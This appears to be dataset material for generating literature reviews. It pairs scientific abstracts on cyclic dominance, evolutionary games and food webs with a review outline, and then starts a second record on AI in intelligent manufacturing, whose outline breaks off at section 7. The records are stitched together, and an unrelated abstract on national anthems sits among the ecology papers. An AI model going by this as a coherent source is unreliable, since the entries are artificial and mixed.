members protect each other from the external invaders. The Monte Carlo simulations show a surprisingly rich variety of the stable spatial distributions of species and subsequent phase transitions when tuning the control parameter Xs. These very simple models are able to demonstrate that the competition between these associations influences their composition. Sometimes the dominant association is developed via a domain growth. In other cases larger and larger invasion processes precede the prevalence of one of the stable associations. Under some conditions the survival of all the species can be maintained by the cyclic dominance occurring between these associations. --- paper_title: Critical coarsening without surface tension: the universality class of the voter model. 
paper_content: We show that the two-dimensional voter model, usually considered to be only a marginal coarsening system, represents a broad class of models for which phase ordering takes place without surface tension. We argue that voter-like growth is generically observed at order-disorder nonequilibrium transitions solely driven by interfacial noise between dynamically symmetric absorbing states. --- paper_title: Cyclical interactions with alliance-specific heterogeneous invasion rates paper_content: We study a six-species Lotka-Volterra-type system on different two-dimensional lattices when each species has two superior and two inferior partners. The invasion rates from predator sites to a randomly chosen neighboring prey site depend on the predator-prey pair, whereby cyclic symmetries within the two three-species defensive alliances are conserved. Monte Carlo simulations reveal an unexpected nonmonotonous dependence of alliance survival on the difference of alliance-specific invasion rates. This behavior is qualitatively reproduced by a four-point mean-field approximation. The study addresses fundamental problems of stability for the competition of two defensive alliances and thus has important implications in natural and social sciences. --- paper_title: Self-organizing patterns maintained by competing associations in a six-species predator-prey model paper_content: Formation and competition of associations are studied in a six-species ecological model where each species has two predators and two prey. Each site of a square lattice is occupied by an individual belonging to one of the six species. The evolution of the spatial distribution of species is governed by iterated invasions between the neighboring predator-prey pairs with species specific rates and by site exchange between the neutral pairs with a probability X . This dynamical rule yields the formation of five associations composed of two or three species with proper spatiotemporal patterns. For large X a cyclic dominance can occur between the three two-species associations whereas one of the two three-species associations prevails in the whole system for low values of X in the final state. Within an intermediate range of X all the five associations coexist due to the fact that cyclic invasions between the two-species associations reduce their resistance temporarily against the invasion of three-species associations. --- paper_title: Defensive alliances in spatial models of cyclical population interactions paper_content: As a generalization of the three-strategy Rock-Scissors-Paper game dynamics in space, cyclical interaction models of six mutating species are studied on a square lattice, in which each species is supposed to have two dominant, two subordinated, and a neutral interacting partner. Depending on their interaction topologies, all imaginable systems can be classified into four (isomorphic) groups exhibiting significantly different behaviors as a function of mutation rate. In three out of four cases three (or four) species form defensive alliances that maintain themselves in a self-organizing polydomain structure via cyclic invasions. Varying the mutation rate, this mechanism results in an ordering phenomenon analogous to that of magnetic Ising systems. The model explains a very basic mechanism of community organization, which might gain important applications in biology, economics, and sociology. 
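Several of the abstracts above describe essentially the same simulation scheme: random sequential invasions between neighbouring predator-prey pairs on a square lattice, supplemented by site exchange between neutral pairs with probability X. The sketch below is a minimal, self-contained illustration of that scheme; it is not code from any of the cited studies, and the food web (each species preying on the next two in cyclic order and neutral to the opposite one), the lattice size, and all rates are illustrative assumptions.

import numpy as np

def six_species_lattice(L=60, n=6, X=0.05, mcs=100, seed=1):
    # Illustrative sketch: species s preys on (s+1)%n and (s+2)%n,
    # is neutral to (s+3)%n, and is prey of the remaining two species.
    rng = np.random.default_rng(seed)
    lat = rng.integers(n, size=(L, L))
    nbrs = ((1, 0), (-1, 0), (0, 1), (0, -1))
    for _ in range(mcs * L * L):              # one MCS = L*L elementary updates
        x, y = rng.integers(L), rng.integers(L)
        dx, dy = nbrs[rng.integers(4)]
        u, v = (x + dx) % L, (y + dy) % L     # periodic boundary conditions
        s, t = lat[x, y], lat[u, v]
        d = (t - s) % n
        if d in (1, 2):                       # focal species invades its prey
            lat[u, v] = s
        elif d in (n - 1, n - 2):             # the neighbour invades the focal site
            lat[x, y] = t
        elif d == 3 and rng.random() < X:     # neutral pair: site exchange
            lat[x, y], lat[u, v] = t, s
    return lat

Monitoring the densities of the individual species, or of the emerging three-species alliances, as a function of X gives a quick qualitative picture of the domain growth and phase behaviour discussed in the abstracts above.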
--- paper_title: Noise-guided evolution within cyclical interactions paper_content: We study a stochastic predator–prey model on a square lattice, where each of the six species has two superior and two inferior partners. The invasion probabilities between species depend on the predator–prey pair and are supplemented by Gaussian noise. Conditions are identified that warrant the largest impact of noise on the evolutionary process, and the results of Monte Carlo simulations are qualitatively reproduced by a four-point cluster dynamical mean-field approximation. The observed noise-guided evolution is deeply routed in short-range spatial correlations, which is supported by simulations on other host lattice topologies. Our findings are conceptually related to the coherence resonance phenomenon in dynamical systems via the mechanism of threshold duality. We also show that the introduced concept of noise-guided evolution via the exploitation of threshold duality is not limited to predator–prey cyclical interactions, but may apply to models of evolutionary game theory as well, thus indicating its applicability in several different fields of research. --- paper_title: Competing associations in bacterial warfare with two toxins paper_content: Simple combinations of common competitive mechanisms can easily result in cyclic competitive dominance relationships between species. The topological features of such competitive networks allow for complex spatial coexistence patterns. We investigate self-organization and coexistence in a lattice model, describing the spatial population dynamics of competing bacterial strains. With increasing diffusion rate the community of the nine possible toxicity/resistance types undergoes two phase transitions. Below a critical level of diffusion, the system exhibits expanding domains of three different defensive alliances, each consisting of three cyclically dominant species. Due to the neutral relationship between these alliances and the finite system size effect, ultimately only one of them remains. At large diffusion rates the system admits three coexisting domains, each containing mutually neutral species. Because of the cyclical dominance between these domains, a long term stable coexistence of all species is ensured. In the third phase at intermediate diffusion the spatial structure becomes even more complicated with domains of mutually neutral species persisting along the borders of defensive alliances. The study reveals that cyclic competitive relationships may produce a large variety of complex coexistence patterns, exhibiting common features of natural ecosystems, like hierarchical organization, phase transitions and sudden, large-scale fluctuations. --- paper_title: Coherence resonance in a spatial prisoner's dilemma game paper_content: We study effects of additive spatiotemporal random variations, introduced to the payoffs of a spatial prisoner's dilemma game, on the evolution of cooperation. In the absence of explicit payoff variations the system exhibits a phase transition from a mixed state of cooperators and defectors to a homogenous state of defectors belonging to the directed percolation universality class. By introducing nonzero random variations to the payoffs, this phase transition can be reverted in a resonance-like manner depending on the variance of noise, thus marking coherence resonance in the system. 
We argue that explicit random payoff variations present a viable mechanism that promotes cooperation for defection temptation values substantially exceeding the one marking the transition point to homogeneity by deterministic payoffs. --- paper_title: A golden point rule in rock–paper–scissors–lizard–spock game paper_content: We study a novel five-species system on two-dimensional lattices in which each species has two superior and two inferior partners. Here we simplify the huge parameter space of predation probability to only two parameters. Both Monte Carlo simulations and mean-field theory reveal that two of the strategies may die out when the ratio of the two parameters is close to the golden point 0.618, and the remaining three strategies form a cyclic dominance system. --- paper_title: Competition of individual and institutional punishments in spatial public goods games paper_content: We have studied the evolution of strategies in spatial public goods games where both individual (peer) and institutional (pool) punishments are present besides unconditional defector and cooperator strategies. The evolution of strategy distribution is governed by imitation based on random sequential comparison of neighbors' payoff for a fixed level of noise. Using numerical simulations we have evaluated the strategy frequencies and phase diagrams when varying the synergy factor, punishment cost, and fine. Our attention is focused on two extreme cases describing all the relevant behaviors in such a complex system. According to our numerical data peer punishers prevail and control the system behavior in large segments of the parameter space, while pool punishers can only survive in the limit of weak peer punishment when a rich variety of solutions is observed. Paradoxically, the two types of punishment may extinguish each other's impact resulting in the triumph of defectors. The technical difficulties and suggested methods are briefly discussed. --- paper_title: Does local competition increase the coexistence of species in intransitive networks? paper_content: Competitive intransitivity, a situation in which species' competitive ranks cannot be listed in a strict hierarchy, promotes species coexistence through "enemy's enemy indirect facilitation." Theory suggests that intransitivity-mediated coexistence is enhanced when competitive interactions occur at local spatial scales, although this hypothesis has not been thoroughly tested. Here, we use a lattice model to investigate the effect of local vs. global competition on intransitivity-mediated coexistence across a range of species richness values and levels of intransitivity. Our simulations show that local competition can enhance intransitivity-mediated coexistence in the short-term, yet hinder it in the long-term, when compared to global competition. This occurs because local competition slows species disaggregation, allowing weaker competitors to persist longer in the shifting spatial refuges of intransitive networks, enhancing short-term coexistence. Conversely, our simulations show that, in the long-term, local competition traps disaggregated species in unfavorable areas of the competitive arena, where they are excluded by superior competitors. As a result, in the long-term, global intransitive competition allows a greater number of species to coexist than local intransitive competition.
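The local-versus-global comparison made in the last abstract is easy to prototype. The sketch below is a hypothetical illustration rather than code from the cited study: it draws a random tournament among S species, lets the winner of each pairwise contest take over the loser's site, and chooses the competitor either from the four nearest neighbours (local) or from anywhere on the lattice (global). All parameter values are made up.

import numpy as np

def intransitive_competition(S=12, L=50, local=True, mcs=200, seed=2):
    rng = np.random.default_rng(seed)
    # Random tournament: beats[i, j] == True means species i displaces species j.
    beats = np.zeros((S, S), dtype=bool)
    for i in range(S):
        for j in range(i + 1, S):
            if rng.random() < 0.5:
                beats[i, j] = True
            else:
                beats[j, i] = True
    lat = rng.integers(S, size=(L, L))
    nbrs = ((1, 0), (-1, 0), (0, 1), (0, -1))
    for _ in range(mcs * L * L):
        x, y = rng.integers(L), rng.integers(L)
        if local:
            dx, dy = nbrs[rng.integers(4)]
            u, v = (x + dx) % L, (y + dy) % L
        else:
            u, v = rng.integers(L), rng.integers(L)
        s, t = lat[x, y], lat[u, v]
        if beats[s, t]:
            lat[u, v] = s                    # winner takes the loser's site
        elif beats[t, s]:
            lat[x, y] = t
    return len(np.unique(lat))               # number of surviving species

Comparing the number of surviving species after short and long runs for local=True and local=False gives a quick feel for the short-term versus long-term contrast reported in the abstract.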
--- paper_title: Chemical Warfare Among Invaders: A Detoxification Interaction Facilitates an Ant Invasion paper_content: As tawny crazy ants ( Nylanderia fulva ) invade the southern USA, they often displace imported fire ants ( Solenopsis invicta ). Following exposure to S. invicta venom, N. fulva applies abdominal exocrine gland secretions to its cuticle. Bioassays reveal that these secretions detoxify S. invicta venom. Further, formic acid, from N. fulva venom, is the detoxifying agent. N. fulva exhibits this detoxification behavior after conflict with a variety of ant species; however, it expresses it most intensely after interactions with S. invicta . This behavior may have evolved in their shared South American native range. The unique capacity to detoxify a major competitor’s venom likely contributes substantially to its ability to displace S. invicta populations, making this behavior a causative agent in the ecological transformation of regional arthropod assemblages. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: The role of diversity in the evolution of cooperation paper_content: Understanding the evolutionary mechanisms that promote and maintain cooperative behavior is recognized as a major theoretical problem where the intricacy increases with the complexity of the participating individuals. This is epitomized by the diverse nature of Human interactions, contexts, preferences and social structures. Here we discuss how social diversity, in several of its flavors, catalyzes cooperative behavior. From the diversity in the number of interactions an individual is involved to differences in the choice of role models and contributions, diversity is shown to significantly increase the chances of cooperation. Individual diversity leads to an overall population dynamics in which the underlying dilemma of cooperation is changed, benefiting the society as whole. In addition, we show how diversity in social contexts can arise from the individual capacity for organizing their social ties. As such, Human diversity, on a grand scale, may be instrumental in shaping us as the most sophisticated cooperative entities on this planet. 
--- paper_title: Social diversity promotes the emergence of cooperation in public goods games paper_content: Although humans often cooperate with each other, the temptation to forego the public good mostly wins over collective cooperative action, leading to the so-called 'tragedy of the commons'. Many existing models treat individuals as equivalent, ignoring diversity and population structure. Santos et al. show theoretically that social diversity, introduced via heterogeneous graphs, promotes the emergence of cooperation in public goods games. Humans often cooperate in public goods games and situations ranging from family issues to global warming. However, evolutionary game theory predicts that the temptation to forgo the public good mostly wins over collective cooperative action, and this is often also seen in economic experiments. Here we show how social diversity provides an escape from this apparent paradox. Up to now, individuals have been treated as equivalent in all respects, in sharp contrast with real-life situations, where diversity is ubiquitous. We introduce social diversity by means of heterogeneous graphs and show that cooperation is promoted by the diversity associated with the number and size of the public goods game in which each individual participates and with the individual contribution to each such game. When social ties follow a scale-free distribution, cooperation is enhanced whenever all individuals are expected to contribute a fixed amount irrespective of the plethora of public goods games in which they engage. Our results may help to explain the emergence of cooperation in the absence of mechanisms based on individual reputation and punishment. Combining social diversity with reputation and punishment will provide instrumental clues on the self-organization of social communities and their economical implications. --- paper_title: Network structure, predator–prey modules, and stability in large food webs paper_content: Large, complex networks of ecological interactions with random structure tend invariably to instability. This mathematical relationship between complexity and local stability ignited a debate that has populated ecological literature for more than three decades. Here we show that, when species interact as predators and prey, systems as complex as the ones observed in nature can still be stable. Moreover, stability is highly robust to perturbations of interaction strength, and is largely a property of structure driven by predator–prey loops with the stability of these small modules cascading into that of the whole network. These results apply to empirical food webs and models that mimic the structure of natural systems as well. These findings are also robust to the inclusion of other types of ecological links, such as mutualism and interference competition, as long as consumer–resource interactions predominate. These considerations underscore the influence of food web structure on ecological dynamics and challenge the current view of interaction strength and long cycles as main drivers of stability in natural communities.
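The stability argument summarised in the food-web abstract directly above is usually phrased in terms of the leading eigenvalue of a random community matrix with predator-prey sign structure. The snippet below is a generic numerical illustration of that test, not the analysis of the cited study; the community size S, connectance C, interaction scale sigma, and self-regulation d are made-up values.

import numpy as np

def random_predator_prey_matrix(S=250, C=0.1, sigma=0.5, d=1.0, seed=3):
    rng = np.random.default_rng(seed)
    M = np.zeros((S, S))
    for i in range(S):
        for j in range(i + 1, S):
            if rng.random() < C:              # connect the pair with probability C
                a, b = np.abs(rng.normal(0.0, sigma, size=2))
                M[i, j], M[j, i] = a, -b      # predator gains, prey loses
    np.fill_diagonal(M, -d)                   # self-regulation on the diagonal
    return M

M = random_predator_prey_matrix()
print("locally stable:", np.linalg.eigvals(M).real.max() < 0.0)

Repeating this check over many random draws, and comparing the predator-prey sign structure with an unconstrained random matrix of the same size and strength, reproduces the qualitative point of the abstract: the pairing of positive and negative coefficients strongly favours local stability.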
--- paper_title: Competitive intransitivity promotes species coexistence. paper_content: Using a spatially explicit cellular automaton model with local competition, we investigate the potential for varied levels of competitive intransitivity (i.e., nonhierarchical competition) to promote species coexistence. As predicted, on average, increased levels of intransitivity result in more sustained coexistence within simulated communities, although the outcome of competition also becomes increasingly unpredictable. Interestingly, even a moderate degree of intransitivity within a community can promote coexistence, in terms of both the length of time until the first competitive exclusion and the number of species remaining in the community after 500 simulated generations. These results suggest that modest levels of intransitivity in nature, such as those that are thought to be characteristic of plant communities, can contribute to coexistence and, therefore, community-scale biodiversity. We explore a potential connection between competitive intransitivity and neutral theory, whereby competitive intransitivity may represent an important mechanism for "ecological equivalence." --- paper_title: A competitive network theory of species diversity. paper_content: Nonhierarchical competition between species has been proposed as a potential mechanism for biodiversity maintenance, but theoretical and empirical research has thus far concentrated on systems composed of relatively few species. Here we develop a theory of biodiversity based on a network representation of competition for systems with large numbers of competitors. All species pairs are connected by an arrow from the inferior to the superior. Using game theory, we show how the equilibrium density of all species can be derived from the structure of the network. We show that when species are limited by multiple factors, the coexistence of a large number of species is the most probable outcome and that habitat heterogeneity interacts with network structure to favor diversity. --- paper_title: Meet the New Boss – Same as the Old Boss paper_content: A key paradox of subalternity for the subject throwing off the colonial yoke is the degree to which the collective emergence from the nation-state is to be in the image of the colonizer; that is, as a modern state, notionally on a par with the mother/father country. With a view to understanding the meaning of such symbolic investments, this paper surveys the lyrics of national anthems from a wide range of postcolonial countries. ::: ::: Despite the avowals one regularly finds in the lyrics of postcolonial anthems, and despite the expression of sometimes rote resistance to a putative colonial oppressor, those singing songs which imitate European anthems, and the feeling such anthems inspire, invest identity in the mimetic, rather than the unique. On the basis of a range of observations of anthems and their circumstances, this paper dares to ask finally whether the singing of anthems makes for better worlds. --- paper_title: A General Model for Food Web Structure paper_content: A central problem in ecology is determining the processes that shape the complex networks known as food webs formed by species and their feeding relationships. The topology of these networks is a major determinant of ecosystems' dynamics and is ultimately responsible for their responses to human impacts. Several simple models have been proposed for the intricate food webs observed in nature. 
We show that the three main models proposed so far fail to fully replicate the empirical data, and we develop a likelihood-based approach for the direct comparison of alternative models based on the full structure of the network. Results drive a new model that is able to generate all the empirical data sets and to do so with the highest likelihood. --- paper_title: Dynamics of N-person snowdrift games in structured populations. paper_content: In many real-life situations, the completion of a task by a group toward achieving a common goal requires the cooperation of at least some of its members, who share the required workload. Such cases are conveniently modeled by the N-person snowdrift game, an example of a Public Goods Game. Here we study how an underlying network of contacts affects the evolutionary dynamics of collective action modeled in terms of such a Public Goods Game. We analyze the impact of different types of networks in the global, population-wide dynamics of cooperators and defectors. We show that homogeneous social structures enhance the chances of coordinating toward stable levels of cooperation, while heterogeneous network structures create multiple internal equilibria, departing significantly from the reference scenario of a well-mixed, structureless population. --- paper_title: Evolutionary dynamics of collective action in N-person stag hunt dilemmas paper_content: In the animal world, collective action to shelter, protect and nourish requires the cooperation of group members. Among humans, many situations require the cooperation of more than two individuals simultaneously. Most of the relevant literature has focused on an extreme case, the N-person Prisoner's Dilemma. Here we introduce a model in which a threshold less than the total group is required to produce benefits, with increasing participation leading to increasing productivity. This model constitutes a generalization of the two-person stag hunt game to an N-person game. Both finite and infinite population models are studied. In infinite populations this leads to a rich dynamics that admits multiple equilibria. Scenarios of defector dominance, pure coordination or coexistence may arise simultaneously. On the other hand, whenever one takes into account that populations are finite and when their size is of the same order of magnitude as the group size, the evolutionary dynamics is profoundly affected: it may ultimately invert the direction of natural selection, compared with the infinite population limit. --- paper_title: WHY DO POPULATIONS CYCLE? A SYNTHESIS OF STATISTICAL AND MECHANISTIC MODELING APPROACHES paper_content: Population cycles have long fascinated ecologists. Even in the most-studied populations, however, scientists continue to dispute the relative importance of various potential causes of the cycles. Over the past three decades, theoretical ecologists have cataloged a large number of mechanisms that are capable of generating cycles in population models. At the same time, statisticians have developed new techniques both for characterizing time series and for fitting population models to time-series data. Both disciplines are now sufficiently advanced that great gains in understanding can be made by synthesizing these complementary, and heretofore mostly independent, quantitative approaches. 
In this paper we demonstrate how to apply this synthesis to the problem of population cycles, using both long-term population time series and the often-rich observational and experimental data on the ecology of the species in question. We quantify hypotheses by writing mathematical models that embody the interactions and forces that might cause cycles. Some hypotheses can be rejected out of hand, as being unable to generate even qualitatively appropriate dynamics. We finish quantifying the remaining hypotheses by estimating parameters, both from independent experiments and from fitting the models to the time-series data using modern statistical techniques. Finally, we compare simulated time series generated by the models to the observed time series, using a variety of statistical descriptors, which we refer to collectively as “probes.” The model most similar to the data, as measured by these probes, is considered to be the most likely candidate to represent the mechanism underlying the population cycles. We illustrate this approach by analyzing one of Nicholson’s blowfly populations, in which we know the “true” governing mechanism. Our analysis, which uses only a subset of the information available about the population, uncovers the correct answer, suggesting that this synthetic approach might be successfully applied to field populations as well. --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. --- paper_title: From pairwise to group interactions in games of cyclic dominance paper_content: We study the rock-paper-scissors game in structured populations, where the invasion rates determine individual payoffs that govern the process of strategy change. The traditional version of the game is recovered if the payoffs for each potential invasion stem from a single pairwise interaction. 
However, the transformation of invasion rates to payoffs also allows the usage of larger interaction ranges. In addition to the traditional pairwise interaction, we therefore consider simultaneous interactions with all nearest neighbors, as well as with all nearest and next-nearest neighbors, thus effectively going from single pair to group interactions in games of cyclic dominance. We show that differences in the interaction range affect not only the stationary fractions of strategies, but also their relations of dominance. The transition from pairwise to group interactions can thus decelerate and even revert the direction of the invasion between the competing strategies. Like in evolutionary social dilemmas, in games of cyclic dominance too the indirect multipoint interactions that are due to group interactions hence play a pivotal role. Our results indicate that, in addition to the invasion rates, the interaction range is at least as important for the maintenance of biodiversity among cyclically competing strategies. --- paper_title: Social diversity and promotion of cooperation in the spatial prisoner's dilemma game paper_content: The diversity in wealth and social status is present not only among humans, but throughout the animal world. We account for this observation by generating random variables that determine the social diversity of players engaging in the prisoner's dilemma game. Here the term social diversity is used to address extrinsic factors that determine the mapping of game payoffs to individual fitness. These factors may increase or decrease the fitness of a player depending on its location on the spatial grid. We consider different distributions of extrinsic factors that determine the social diversity of players, and find that the power-law distribution enables the best promotion of cooperation. The facilitation of the cooperative strategy relies mostly on the inhomogeneous social state of players, resulting in the formation of cooperative clusters which are ruled by socially high-ranking players that are able to prevail against the defectors even when there is a large temptation to defect. To confirm this, we also study the impact of spatially correlated social diversity and find that cooperation deteriorates as the spatial correlation length increases. Our results suggest that the distribution of wealth and social status might have played a crucial role by the evolution of cooperation amongst egoistic individuals. ---
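The cyclic invasion dynamics summarized in the abstracts above have a simple well-mixed (mean-field) limit that is often used as the baseline for the structured-population results reviewed in the outline that follows. The Python sketch below is not taken from any of the cited papers: it integrates the standard replicator equation for rock-paper-scissors with a hypothetical zero-sum payoff matrix, so the matrix, the initial frequencies and the step size are illustrative assumptions.

import numpy as np

# Illustrative sketch only: replicator dynamics for a well-mixed
# rock-paper-scissors population. A is a hypothetical zero-sum payoff
# matrix; x holds the three strategy frequencies.
A = np.array([[ 0.0, -1.0,  1.0],   # rock:    loses to paper, beats scissors
              [ 1.0,  0.0, -1.0],   # paper:   beats rock, loses to scissors
              [-1.0,  1.0,  0.0]])  # scissors
x = np.array([0.5, 0.3, 0.2])       # initial frequencies (sum to 1)
dt, steps = 0.01, 5000
for _ in range(steps):
    fitness = A @ x                               # payoff of each strategy against the mix
    mean_fitness = x @ fitness
    x = x + dt * x * (fitness - mean_fitness)     # replicator equation, Euler step
    x = np.clip(x, 0.0, None)
    x /= x.sum()                                  # guard against numerical drift
print("final frequencies:", np.round(x, 3))

For this zero-sum choice the frequencies orbit the interior fixed point (1/3, 1/3, 1/3) rather than converging; the lattice structure, mobility and group interactions discussed in the papers above are what turn such neutral orbits into spirals, heteroclinic cycles or extinction.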
Title: Cyclic dominance in evolutionary games: A review Section 1: INTRODUCTION Description 1: Introduce the concept of cyclic dominance in evolutionary games and its significance in explaining biodiversity and evolutionary dynamics. Highlight examples from nature and describe the role of spatial structure and mobility. Section 2: ROCK-PAPER-SCISSORS GAME IN STRUCTURED POPULATIONS Description 2: Discuss the dynamics of the rock-paper-scissors (RPS) game in structured populations, focusing on interaction networks and the effect of mobility on the outcome of these games. Section 3: Interaction networks Description 3: Explore how different types of interaction networks, such as lattices and small-world networks, impact the dynamics and outcome of cyclic dominance in evolutionary games. Section 4: Mobility Description 4: Review the impact of mobility on biodiversity and pattern formation in RPS games, including the emergence of spiral and target waves. Section 5: Metapopulation and nonlinear mobility Description 5: Introduce the metapopulation modeling approach and discuss nonlinear mobility's effects on the evolutionary dynamics of cyclic dominance games. Section 6: Complex Ginzburg-Landau equation Description 6: Explain the derivation and application of the Complex Ginzburg-Landau equation (CGLE) to predict spatio-temporal patterns in RPS games. Section 7: EVOLUTIONARY GAMES WITH SPONTANEOUSLY EMERGING CYCLIC DOMINANCE Description 7: Discuss instances where cyclic dominance emerges spontaneously in evolutionary games, covering topics such as time-dependent learning and voluntary participation. Section 8: Time-dependent learning Description 8: Analyze the role of time-dependent properties, like learning ability, in generating cyclic dominance in two-strategy and more complex games. Section 9: Voluntary participation Description 9: Review the effects of voluntary participation in public goods games, including the emergence and experimental validation of the "Red Queen" effect. Section 10: When three competing strategies are more than three Description 10: Examine cases where an alliance of strategies acts as an additional "strategy" in cyclic dominance, focusing on structured populations. Section 11: CYCLIC DOMINANCE BETWEEN MORE THAN THREE STRATEGIES Description 11: Investigate the complexity of evolutionary dynamics when the number of competing strategies exceeds three and discuss the emergence of defensive alliances and global oscillations. Section 12: Alliances Description 12: Detail the formation and impact of alliances within cyclic dominance games, highlighting examples and the conditions under which they form. Section 13: CONCLUSIONS AND OUTLOOK Description 13: Summarize the main findings and discuss unexplored problems related to cyclic dominance in evolutionary games, offering insights and directions for future research.
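Section 2 of the outline above treats the rock-paper-scissors game on lattices. As a hedged illustration only, the sketch below runs a deliberately stripped-down Monte Carlo on a periodic square lattice: a random site and a random neighbor interact, and the dominated strategy is replaced. Reproduction, selection strength and the mobility mechanisms to which the review attributes pattern formation are all omitted, and the lattice size and number of sweeps are arbitrary choices.

import numpy as np

# Stripped-down cyclic dominance on a periodic square lattice:
# strategy 0 beats 1, 1 beats 2, 2 beats 0.
rng = np.random.default_rng(0)
L = 64
grid = rng.integers(0, 3, size=(L, L))
neighbors = [(1, 0), (-1, 0), (0, 1), (0, -1)]

def sweep(grid, n_updates):
    for _ in range(n_updates):
        x, y = rng.integers(0, L, size=2)
        dx, dy = neighbors[rng.integers(0, 4)]
        nx, ny = (x + dx) % L, (y + dy) % L       # periodic boundaries
        a, b = grid[x, y], grid[nx, ny]
        if (b - a) % 3 == 1:                      # focal strategy a beats neighbor b
            grid[nx, ny] = a
        elif (a - b) % 3 == 1:                    # neighbor b invades the focal site
            grid[x, y] = b
    return grid

for _ in range(30):                               # 30 Monte Carlo sweeps
    grid = sweep(grid, L * L)
density = np.bincount(grid.ravel(), minlength=3) / (L * L)
print("strategy densities:", np.round(density, 3))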
Applications of artificial intelligence in intelligent manufacturing: a review
18
--- paper_title: Visual Computing as a Key Enabling Technology for Industrie 4.0 and Industrial Internet paper_content: A worldwide movement in advanced manufacturing countries is seeking to reinvigorate (and revolutionize) the industrial and manufacturing core competencies with the use of the latest advances in information and communications technology. Visual computing plays an important role as the "glue factor" in complete solutions. This article positions visual computing in its intrinsic crucial role for Industrie 4.0 and provides a general, broad overview and points out specific directions and scenarios for future research. --- paper_title: A Cyber-Physical Systems architecture for Industry 4.0-based manufacturing systems paper_content: Abstract Recent advances in manufacturing industry has paved way for a systematical deployment of Cyber-Physical Systems (CPS), within which information from all related perspectives is closely monitored and synchronized between the physical factory floor and the cyber computational space. Moreover, by utilizing advanced information analytics, networked machines will be able to perform more efficiently, collaboratively and resiliently. Such trend is transforming manufacturing industry to the next generation, namely Industry 4.0. At this early development phase, there is an urgent need for a clear definition of CPS. In this paper, a unified 5-level architecture is proposed as a guideline for implementation of CPS. --- paper_title: A dynamic model and an algorithm for short-term supply chain scheduling in the smart factory industry 4.0 paper_content: Smart factories Industry 4.0 on the basis of collaborative cyber-physical systems represents a future form of industrial networks. Supply chains in such networks have dynamic structures which evolve over time. In these settings, short-term supply chain scheduling in smart factories Industry 4.0 is challenged by temporal machine structures, different processing speed at parallel machines and dynamic job arrivals. In this study, for the first time, a dynamic model and algorithm for short-term supply chain scheduling in smart factories Industry 4.0 is presented. The peculiarity of the considered problem is the simultaneous consideration of both machine structure selection and job assignments. The scheduling approach is based on a dynamic non-stationary interpretation of the execution of the jobs and a temporal decomposition of the scheduling problem. The algorithmic realisation is based on a modified form of the continuous maximum principle blended with mathematical optimisation. A detailed theoretical analysis of the temporal decomposition and computational complexity is performed. The optimality conditions as well as the structural properties of the model and the algorithm are investigated. Advantages and limitations of the proposed approach are discussed. --- paper_title: Cloud Manufacturing Platform: Operating Paradigm, Functional Requirements, and Architecture Design paper_content: Cloud manufacturing is emerging as a new promising business paradigm as well as an integrated technical approach, contributing to the shaping of a highly-collaborative, knowledge-intensive, service-oriented and eco-efficient manufacturing industry. The following research issues concerning cloud manufacturing platform, what users can achieve with the platform, what the platform can do, and how to design it, play crucial roles in this new area. 
This paper proposes a cloud manufacturing paradigm that depicts a typical scenario which can provide an explanation for the concept of cloud manufacturing and makes the mysterious “cloud” transparent. Then the functional requirements of cloud manufacturing platform are investigated to specify design objectives. Based on these, the paper presents the design of MfgCloud, a cloud manufacturing platform prototype. In discussion of the main components of MfgCloud, the specific concepts different from those corresponding terms in IT area are also defined and given their implementation mechanisms. Consequently, this paper proposes a new point of view for the concept of cloud manufacturing, and accordingly presents a reference design of cloud manufacturing platform. Copyright © 2013 by ASME --- paper_title: Cloud manufacturing: a new service-oriented networked manufacturing model paper_content: To solve more complex manufacturing problems and perform larger-scale collaborative manufacturing, the impediments to practical application and development of Networked Manufacturing (NM) were analyzed. Technologies such as cloud computing, cloud security, high performance computing, and the Internet of things, which were used to solve the mentioned impediments, were briefly described. Based on it, a new service-oriented networked manufacturing model called Cloud Manufacturing (CMfg) was put forward. Then, the concept of CMfg was defined, and differences among CMfg, application service provider and manufacturing grid were discussed. CMfg architecture was also proposed, key technologies for implementing CMfg were studied and preliminary research results were introduced. Finally, an application prototype of CMfg, i.e., COSIM-SCP, was presented. ---
Title: Applications of artificial intelligence in intelligent manufacturing: a review Section 1: Introduction Description 1: This section introduces the current technological and industrial revolution focusing on the integration of AI with manufacturing processes to enhance the national economy, security, and well-being. Section 2: New development of artificial intelligence Description 2: This section covers the evolution of AI into a new phase (AI 2.0) driven by big data, the Internet, and other emerging technologies, highlighting market demand and technological advancements in various smart systems. Section 3: Artificial intelligence facilitates the development of intelligent manufacturing Description 3: This section discusses how AI applications foster new manufacturing models, methods, and ecosystems by improving efficiency, quality, and market competitiveness. Section 4: New models, means, and forms of intelligent manufacturing Description 4: This section details innovative manufacturing models, integration means, and ecosystem forms, emphasizing the role of AI in transforming production and services. Section 5: Intelligent manufacturing system architecture Description 5: This section outlines the architectural layers of intelligent manufacturing systems, including resources/capacities, networks, service platforms, intelligent cloud services, and security management. Section 6: Resources/capacities layer Description 6: This section describes the various hard and soft resources and manufacturing capacities required in the intelligent manufacturing system. Section 7: Ubiquitous network 